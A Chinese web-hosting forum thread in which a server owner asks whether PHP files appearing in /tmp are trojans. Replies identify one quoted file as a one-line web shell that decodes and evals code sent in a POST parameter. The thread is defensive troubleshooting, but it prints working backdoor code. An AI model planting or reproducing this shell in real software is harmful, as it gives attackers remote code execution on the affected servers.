全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1591|回复: 12

[lighttpd] 请教大佬,这是木马吗

[复制链接]
发表于 2019-8-18 17:49:07 | 显示全部楼层 |阅读模式
/tmp目录下,总是会生成php前缀的文件,



虽然没啥影响,不过腾讯云云镜老是提示是木马文件,大佬们遇到过这情况没
发表于 2019-8-18 17:53:41 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
 楼主| 发表于 2019-8-18 17:58:21 | 显示全部楼层
酷酷猫 发表于 2019-8-18 17:53
你看看文件里面 是什么代码

各种各样的都有   
有的是代码  
  1. Ra<?php function a($a){@eval(@gzinflate($a));} function b($b){return base64_decode($b);} @a(@b($_POST['zs']));?>
复制代码

有的文件是链接     像是推广。。不管了
发表于 2019-8-18 17:59:08 | 显示全部楼层
guoaibing 发表于 2019-8-18 17:58
各种各样的都有   
有的是代码  

  这是一句话
发表于 2019-8-18 17:59:55 来自手机 | 显示全部楼层
eval和$_POST搭配在一起用一定是被挂马了
发表于 2019-8-18 18:02:48 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
 楼主| 发表于 2019-8-18 18:03:49 | 显示全部楼层
my49cn 发表于 2019-8-18 17:59
eval和$_POST搭配在一起用一定是被挂马了

大佬,在/tmp目录下有影响吗     这情况貌似一直有,没发现有啥影响
发表于 2019-8-18 18:05:56 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2019-8-18 18:18:52 | 显示全部楼层
guoaibing 发表于 2019-8-18 17:58
各种各样的都有   
有的是代码  

一看就是一句话了,POST里面就是密码了把。
发表于 2019-8-18 18:23:12 来自手机 | 显示全部楼层
guoaibing 发表于 2019-8-18 18:03
大佬,在/tmp目录下有影响吗     这情况貌似一直有,没发现有啥影响

只要这个文件能被调用。就会有影响。你检查下有没有什么东西加载了tmp目录下的这些文件。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-26 16:34 , Processed in 0.065450 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表